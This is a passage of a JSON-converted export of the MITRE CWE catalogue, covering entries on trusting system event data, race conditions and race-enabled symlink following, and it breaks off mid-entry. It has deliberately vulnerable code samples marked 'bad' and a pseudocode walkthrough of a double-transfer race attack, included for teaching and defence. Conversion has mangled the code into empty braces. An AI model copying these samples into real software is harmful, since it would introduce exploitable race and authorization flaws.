Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":[{"#text":"Privacy Violation","attr":{"@_Date":"2014-02-18"}},{"#text":"Exposure of Private Information (\'Privacy Violation\')","attr":{"@_Date":"2020-02-24"}}]}},"360":{"attr":{"@_ID":"360","@_Name":"Trust of System Event Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Security based on event locations are insecure and can be spoofed.","Extended_Description":"Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop can send a message to any window on the same desktop. There is no authentication framework for these messages. Therefore, any message can be used to manipulate any process on the desktop if the process does not check the validity and safeness of those messages.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"If one trusts the system-event information and executes commands based on it, one could potentially take actions based on a spoofed identity."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Never trust or rely any of the information in an Event for security."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example code prints out secret information when an authorized user activates a button:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent e) {}","xhtml:div":{"#text":"if (e.getSource() == button) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"print out secret information\\");","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"This code does not attempt to prevent unauthorized users from activating the button. Even if the button is rendered non-functional to unauthorized users in the application UI, an attacker can easily send a false button press event to the application window and expose the secret information."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trust of system event data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"362":{"attr":{"@_ID":"362","@_Name":"Concurrent Execution using Shared Resource with Improper Synchronization (\'Race Condition\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.","Extended_Description":{"xhtml:p":["This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider.","A race condition occurs within concurrent environments, and is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc.","A race condition violates these properties, which are closely related:","A race condition exists when an \\"interfering code sequence\\" can still access the shared resource, violating exclusivity. Programmers may assume that certain code sequences execute too quickly to be affected by an interfering code sequence; when they are not, this violates atomicity. For example, the single \\"x++\\" statement may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read (the original value of x), followed by a computation (x+1), followed by a write (save the result to x).","The interfering code sequence could be \\"trusted\\" or \\"untrusted.\\" A trusted interfering code sequence occurs within the program; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable program."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Exclusivity - the code sequence is given exclusive access to the shared resource, i.e., no other code sequence can modify properties of the shared resource before the original sequence has completed execution.","Atomicity - the code sequence is behaviorally atomic, i.e., no other thread or process can concurrently execute the same sequence of instructions (or a subset) against the same resource."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Java","@_Prevalence":"Sometimes"}}],"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"When a race condition makes it possible to bypass a resource cleanup routine or trigger multiple initialization routines, it may lead to resource exhaustion (CWE-400)."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Instability"],"Note":"When a race condition allows multiple control flows to access a resource simultaneously, it might lead the program(s) into unexpected states, possibly resulting in a crash."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Read Application Data"],"Note":"When a race condition is combined with predictable resource names and loose permissions, it may be possible for an attacker to overwrite or access confidential data (CWE-59)."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"Black box methods may be able to identify evidence of race conditions via methods such as multiple simultaneous connections, which may cause the software to become instable or crash. However, race conditions with very narrow timing windows would not be detectable."},{"Method":"White Box","Description":"Common idioms are detectable in white box analysis, such as time-of-check-time-of-use (TOCTOU) file operations (CWE-367), or double-checked locking (CWE-609)."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Race conditions may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior.","Insert breakpoints or delays in between relevant code statements to artificially expand the race window so that it will be easier to detect."]},"Effectiveness":"Moderate"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Framework-based Fuzzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance."},{"Phase":"Architecture and Design","Description":"Use thread-safe capabilities such as the data access abstraction in Spring."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring.","Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400)."]}},{"Phase":"Implementation","Description":"When using multithreading and operating on shared variables, only use thread-safe functions."},{"Phase":"Implementation","Description":"Use atomic operations on shared variables. Be wary of innocent-looking constructs such as \\"x++\\". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write."},{"Phase":"Implementation","Description":"Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412."},{"Phase":"Implementation","Description":"Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization."},{"Phase":"Implementation","Description":"Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop."},{"Phase":"Implementation","Description":"Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code could be used in an e-commerce application that supports transfers between accounts. It takes the total amount of the transfer, sends it to the new account, and deducts the amount from the original account.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$transfer_amount = GetTransferAmount();$balance = GetBalanceFromDatabase();if ($transfer_amount &lt; 0) {}$newbalance = $balance - $transfer_amount;if (($balance - $transfer_amount) &lt; 0) {}SendNewBalanceToDatabase($newbalance);NotifyUser(\\"Transfer of $transfer_amount succeeded.\\");NotifyUser(\\"New balance: $newbalance\\");","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"FatalError(\\"Bad Transfer Amount\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"FatalError(\\"Insufficient Funds\\");","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:div":{"#text":"In the following pseudocode, the attacker makes two simultaneous calls of the program, CALLER-1 and CALLER-2. Both callers are for the same user account.CALLER-1 (the attacker) is associated with PROGRAM-1 (the instance that handles CALLER-1). CALLER-2 is associated with PROGRAM-2.CALLER-1 makes a transfer request of 80.00.PROGRAM-1 calls GetBalanceFromDatabase and sets $balance to 100.00PROGRAM-1 calculates $newbalance as 20.00, then calls SendNewBalanceToDatabase().Due to high server load, the PROGRAM-1 call to SendNewBalanceToDatabase() encounters a delay.CALLER-2 makes a transfer request of 1.00.PROGRAM-2 calls GetBalanceFromDatabase() and sets $balance to 100.00. This happens because the previous PROGRAM-1 request was not processed yet.PROGRAM-2 determines the new balance as 99.00.After the initial delay, PROGRAM-1 commits its balance to the database, setting it to 20.00.PROGRAM-2 sends a request to update the database, setting the balance to 99.00","xhtml:br":["","","","","","","","","",""]}}],"Body_Text":["A race condition could occur between the calls to GetBalanceFromDatabase() and SendNewBalanceToDatabase().","Suppose the balance is initially 100.00. An attack could be constructed as follows:","At this stage, the attacker should have a balance of 19.00 (due to 81.00 worth of transfers), but the balance is 99.00, as recorded in the database.","To prevent this weakness, the programmer has several options, including using a lock to prevent multiple simultaneous requests to the web application, or using a synchronization mechanism that includes all the code between GetBalanceFromDatabase() and SendNewBalanceToDatabase()."]},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-18827","Description":"chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"},{"Reference":"CVE-2014-8273","Description":"Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8273"},{"Reference":"CVE-2008-5044","Description":"Race condition leading to a crash by calling a hook removal procedure while other activities are occurring at the same time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5044"},{"Reference":"CVE-2008-2958","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2958"},{"Reference":"CVE-2008-1570","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1570"},{"Reference":"CVE-2008-0058","Description":"Unsynchronized caching operation enables a race condition that causes messages to be sent to a deallocated object.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0058"},{"Reference":"CVE-2008-0379","Description":"Race condition during initialization triggers a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0379"},{"Reference":"CVE-2007-6599","Description":"Daemon crash by quickly performing operations and undoing them, which eventually leads to an operation that does not acquire a lock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6599"},{"Reference":"CVE-2007-6180","Description":"chain: race condition triggers NULL pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6180"},{"Reference":"CVE-2007-5794","Description":"Race condition in library function could cause data to be sent to the wrong process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794"},{"Reference":"CVE-2007-3970","Description":"Race condition in file parser leads to heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3970"},{"Reference":"CVE-2008-5021","Description":"chain: race condition allows attacker to access an object while it is still being initialized, causing software to access uninitialized memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021"},{"Reference":"CVE-2009-4895","Description":"chain: race condition for an argument value, possibly resulting in NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4895"},{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Race Conditions"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA03-J","Entry_Name":"Do not assume that a group of calls to independently atomic methods is atomic"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}},{"attr":{"@_External_Reference_ID":"REF-349"}},{"attr":{"@_External_Reference_ID":"REF-350"}},{"attr":{"@_External_Reference_ID":"REF-351"}},{"attr":{"@_External_Reference_ID":"REF-352"}},{"attr":{"@_External_Reference_ID":"REF-353"}},{"attr":{"@_External_Reference_ID":"REF-354"}},{"attr":{"@_External_Reference_ID":"REF-355"}},{"attr":{"@_External_Reference_ID":"REF-356"}},{"attr":{"@_External_Reference_ID":"REF-357"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-1237"}}]},"Notes":{"Note":[{"#text":"The relationship between race conditions and synchronization problems (CWE-662) needs to be further developed. They are not necessarily two perspectives of the same core concept, since synchronization is only one technique for avoiding race conditions, and synchronization can be used for other purposes besides race condition prevention.","attr":{"@_Type":"Maintenance"}},{"#text":"Race conditions in web applications are under-studied and probably under-reported. However, in 2008 there has been growing interest in this area.","attr":{"@_Type":"Research Gap"}},{"#text":"Much of the focus of race condition research has been in Time-of-check Time-of-use (TOCTOU) variants (CWE-367), but many race conditions are related to synchronization problems that do not necessarily require a time-of-check.","attr":{"@_Type":"Research Gap"}},{"#text":"From a classification/taxonomy perspective, the relationships between concurrency and program state need closer investigation and may be useful in organizing related issues.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, References, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example"},"Previous_Entry_Name":[{"#text":"Race Conditions","attr":{"@_Date":"2008-04-11"}},{"#text":"Race Condition","attr":{"@_Date":"2010-12-13"}}]}},"363":{"attr":{"@_ID":"363","@_Name":"Race Condition Enabling Link Following","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the software to access the wrong file.","Extended_Description":"While developers might expect that there is a very narrow time window between the time of check and time of use, there is still a race condition. An attacker could cause the software to slow down (e.g. with memory consumption), causing the time window to become larger. Alternately, in some situations, the attacker could win the race by performing a large number of attacks.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"367","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"59","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-49"},"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();if(is_link($filename)){}if(fileowner($filename) == $user){}else{}","xhtml:br":["","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$filename = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Race condition enabling link following"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS35-C","Entry_Name":"Avoid race conditions while checking for the existence of a symbolic link","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Race Conditions&#34;, Page 526"}}},"Notes":{"Note":{"#text":"This is already covered by the \\"Link Following\\" weakness (CWE-59). It is included here because so many people associate race conditions with link problems; however, not all link following issues involve race conditions.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content 